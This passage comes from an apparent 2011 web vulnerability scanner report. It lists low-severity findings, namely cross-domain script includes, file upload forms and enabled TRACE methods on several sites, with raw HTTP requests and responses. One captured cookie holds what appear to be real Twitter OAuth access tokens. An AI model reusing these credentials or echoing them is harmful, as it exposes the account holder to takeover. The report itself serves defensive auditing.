Request

Response

19.98. http://www.seashepherd.org/popups/mobile-signup-lightbox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seashepherd.org
Path:	/popups/mobile-signup-lightbox/

Issue detail

The response dynamically includes the following script from another domain:

http://clients.mobilecause.com/lists/1227/subscriptions/web.js?height=300&width=400

Request

GET /popups/mobile-signup-lightbox/ HTTP/1.1
Host: www.seashepherd.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:15:15 GMT
Server: Apache
Last-Modified: Thu, 01 Jul 2010 23:25:28 GMT
ETag: "261dc9-579-c922ca00"
Accept-Ranges: bytes
Content-Length: 1401
X-Powered-By: PleskLin
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h3>
<script src="http://clients.mobilecause.com/lists/1227/subscriptions/web.js?height=300&width=400" type="text/javascript"></script>
...[SNIP]...

19.99. http://www.silverpop.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://apis.google.com/js/plusone.js
http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js
http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js

Request

GET / HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:52:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Jul 2011 21:04:29 GMT
ETag: "d0258-66f4-b1d81140"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 26356
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; c
...[SNIP]...

<script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js" type="text/javascript"></script>
...[SNIP]...

<script src="http://apis.google.com/js/plusone.js" type="text/javascript"></script>
...[SNIP]...

<script src="http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js" type="text/javascript"></script>
...[SNIP]...

19.100. http://www.silverpop.com/demo/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/demo/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://content.mkt51.net/lp/static/js/iMAWebCookie.js?1a8b3ca-1267bb7dbd6-c6f842ded9e6d11c5ffebd715e129037&h=www.pages05.net

Request

GET /demo/index.html HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/marketing-resources/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 May 2011 19:11:43 GMT
ETag: "f7f83-8d45-138239c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 36165
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

<script src="http://content.mkt51.net/lp/static/js/iMAWebCookie.js?1a8b3ca-1267bb7dbd6-c6f842ded9e6d11c5ffebd715e129037&h=www.pages05.net" type="text/javascript"></script>
...[SNIP]...

19.101. http://www.silverpop.com/marketing-resources/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/marketing-resources/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js

Request

GET /marketing-resources/index.html HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 30 May 2011 00:56:50 GMT
ETag: "f7c9b-3f06-c333f880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 16134
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; c
...[SNIP]...

<script src="http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js" type="text/javascript"></script>
...[SNIP]...

19.102. http://www.silverpop.com/tweets.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverpop.com
Path:	/tweets.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/silverpop.json?callback=twitterCallback2&count=2

Request

GET /tweets.html HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:52:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 05 Apr 2010 22:20:03 GMT
ETag: "d0474-36f-bafe6ac0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 879
Content-Type: text/html; charset=UTF-8

<html>
   <head>
       <title></title>

   <link rel="stylesheet" href="/global/default.css" type="text/css" />
   <link rel="stylesheet" href="/global/master.css" type="text/css" />
   
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/silverpop.json?callback=twitterCallback2&count=2"></script>
...[SNIP]...

19.103. http://www.treehugger.com/daylife/related/72065.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/daylife/related/72065.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.dl-rms.com/rms/mother/21163/nodetag.js
http://digg.com/tools/services?type=javascript&callback=diggwb&endPoint=%2Fstories%2Fpopular&count=10&domain=www.treehugger.com&sort=promote_date-desc
http://digg.com/tools/widgetjs
http://edge.quantserve.com/quant.js
http://icompass.insightexpressai.com/549.js
http://js.revsci.net/gateway/gw.js?csid=J08778
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14
Content-Type: text/html
Expires: Sat, 23 Jul 2011 13:19:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:19:16 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 66546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<script type="text/javascript" src="http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://digg.com/tools/widgetjs"></script>
<script
type="text/javascript"
src="http://digg.com/tools/services?type=javascript&callback=diggwb&endPoint=%2Fstories%2Fpopular&count=10&domain=www.treehugger.com&sort=promote_date-desc"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script src="http://content.dl-rms.com/rms/mother/21163/nodetag.js"></script>
<script language="javascript" src="http://icompass.insightexpressai.com/549.js"></script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08778"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

19.104. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://content.dl-rms.com/rms/mother/21163/nodetag.js
http://disqus.com/forums/treehuggercomments/embed.js
http://edge.jobthread.com/jobs.treehugger.com/feeds/jobroll/?num_jobs=6
http://edge.quantserve.com/quant.js
http://icompass.insightexpressai.com/549.js
http://js.revsci.net/gateway/gw.js?csid=J08778
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:19:01 GMT
Content-Length: 61910
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<script type="text/javascript" src="http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.jobthread.com/jobs.treehugger.com/feeds/jobroll/?num_jobs=6"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#appId=133255656700169&xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://disqus.com/forums/treehuggercomments/embed.js"></script>
...[SNIP]...
</div>

<script src="http://content.dl-rms.com/rms/mother/21163/nodetag.js"></script>
<script language="javascript" src="http://icompass.insightexpressai.com/549.js"></script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08778"></script>
...[SNIP]...

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

19.105. http://www.treehugger.com/galleries/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/galleries/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://www.google-analytics.com/urchin.js

Request

Response

19.106. http://www.treehugger.com/science_technology/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/science_technology/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.dl-rms.com/rms/mother/21163/nodetag.js
http://edge.quantserve.com/quant.js
http://icompass.insightexpressai.com/549.js
http://js.revsci.net/gateway/gw.js?csid=J08778
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8
https://apis.google.com/js/plusone.js

Request

Response

19.107. http://www.treehugger.com/travel_nature/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/travel_nature/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.dl-rms.com/rms/mother/21163/nodetag.js
http://edge.quantserve.com/quant.js
http://icompass.insightexpressai.com/549.js
http://js.revsci.net/gateway/gw.js?csid=J08778
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://sm6.sitemeter.com/js/counter.js?site=sm6damnhippy
http://www.google.com/coop/cse/brand?form=searchbox_017401606067716418337%3Abtpggki1yw8
https://apis.google.com/js/plusone.js

Request

Response

19.108. http://www.uscgnews.com/go/doc/786/1135035/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uscgnews.com
Path:	/go/doc/786/1135035/

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-latest.js
http://w.sharethis.com/button/sharethis.js

Request

GET /go/doc/786/1135035/ HTTP/1.1
Host: www.uscgnews.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 21:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
X-UA-Compatible: IE=edge
Content-Type: text/html;charset=utf-8
Content-Length: 14983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<title>Coast Guard officials attend NTSB hearing on fatal colli
...[SNIP]...
</script><script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=218be740-0231-4c2d-8b14-b2efe5b83b72&headerbg=%23666666&linkfg=%23006699"></script>
...[SNIP]...

19.109. http://www.youtube.com/embed/6hCRafyV0zI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/6hCRafyV0zI

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js

Request

Response

19.110. http://www.youtube.com/embed/pDXWOjC-AlA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/pDXWOjC-AlA

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js

Request

Response

19.111. http://www.youtube.com/embed/terD85scv4w previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/terD85scv4w

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js

Request

GET /embed/terD85scv4w HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=MszzkYLcUx8; __utma=27069237.1850136006.1311260263.1311260263.1311260263.1; __utmz=27069237.1311260263.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GEO=561ec842ffaf1e8842f30871bd66643dcwsAAAAzVVOtwdbzTirJbA==; PREF=fv=10.3.181

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:45 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 14071
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - New Seafloor in Google Earth Tour</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflCY3xEz.css">

</head>
<bod
...[SNIP]...
</div>

<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflAm9Ztm.js"></script>
...[SNIP]...

20. File upload functionality previous next
There are 3 instances of this issue:

http://a.fsdn.com/con/js/min/sf.js
http://mediacdn.disqus.com/1311382870/build/system/upload.html
http://sourceforge.net/projects/hoytllc-vcloud/

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

20.1. http://a.fsdn.com/con/js/min/sf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.fsdn.com
Path:	/con/js/min/sf.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://a.fsdn.com/con/js/min/sf.js?1311259746

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Jul 2011 13:48:15 GMT
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 335086
Cache-Control: public, max-age=1073283
Expires: Thu, 04 Aug 2011 14:50:18 GMT
Date: Sat, 23 Jul 2011 04:42:15 GMT
Connection: close

(function($){$.extend({metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o
...[SNIP]...
<form class="fuForm fuLastForm" method="POST" enctype="multipart/form-data" action="'+this.settings.action+'"> <input type="file" class="title" value="" name="'+this.settings.field_name+'" multiple /> <input type="hidden" value="'+this.settings.submit_label+'" name="'+this.settings.hidden_submit_name+'" />
...[SNIP]...

20.2. http://mediacdn.disqus.com/1311382870/build/system/upload.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311382870/build/system/upload.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://mediacdn.disqus.com/1311382870/build/system/upload.html

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /1311382870/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utma=113869458.981292312.1305368048.1309224200.1311427177.13; __utmb=113869458.1.10.1311427177; __utmc=113869458; __utmz=113869458.1311427177.13.13.utmcsr=treehugger.com|utmccn=(referral)|utmcmd=referral|utmcct=/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 23 Jul 2011 01:27:47 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13745
X-Varnish: 3173793910
Cache-Control: max-age=2549383
Expires: Mon, 22 Aug 2011 01:29:15 GMT
Date: Sat, 23 Jul 2011 13:19:32 GMT
Connection: close

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>

<style type="text/css">
html,body,div,span,applet,object,ifram
...[SNIP]...

<input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" />
<input type="hidden" name="id" value="" />
...[SNIP]...

20.3. http://sourceforge.net/projects/hoytllc-vcloud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/hoytllc-vcloud/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://sourceforge.net/projects/hoytllc-vcloud/update

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 23 Jul 2011 04:42:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4e2a512591aa916173001760; expires="Tue, 20-Jul-2021 04:42:14 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=018e8d654755b068e6bd689778eb35747982a299gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDhkMmQ2M2RiZTY0Mjk3ODE0NTIzNjFhYWRmOWFhYjIxcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZTJhNTEyNTkxYWE5MTYxNzMwMDE3NjBxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB04qUSbQlfVUOX2NyZWF0aW9uX3RpbWVxDkdB04qUSZFFB3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 24708
Access-Control-Allow-Origin: *

<!doctype html>




<!--[if IE 8 ]>
...[SNIP]...
<div class="field">
<input name="icon" id="icon" class="file" type="file"/>
</div>
...[SNIP]...

21. TRACE method is enabled previous next
There are 8 instances of this issue:

http://cheetah.vizu.com/
http://forums-test.vostu.com/
http://forums.vostu.com/
http://mm.chitika.net/
http://pixel.everesttech.net/
http://pixel1350.everesttech.net/
http://puma.vizu.com/
http://web2.checkm8.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

21.1. http://cheetah.vizu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cheetah.vizu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cheetah.vizu.com
Cookie: e40fbc2242d74350

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:25:08 GMT
Server: PWS/1.7.3.3
X-Px: nc iad-agg-n13 ( origin>CONN)
Content-Length: 354
Content-Type: message/http
Connection: close

TRACE /ie/ HTTP/1.1
Host: adcatalyst.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n13.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 173.193.214.243, 66.114.52.23
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cheetah.vizu.com/
Cookie: e40fbc2242d74350
Connection: keep-alive

21.2. http://forums-test.vostu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums-test.vostu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: forums-test.vostu.com
Cookie: d4a553c60a0d4f46

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:14:26 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_fcgid/2.3.5 mod_ssl/2.2.14 OpenSSL/0.9.8k
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: forums-test.vostu.com
Cookie: d4a553c60a0d4f46; __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=32124601.12.4.1311275636343

21.3. http://forums.vostu.com/ previous next

Summary

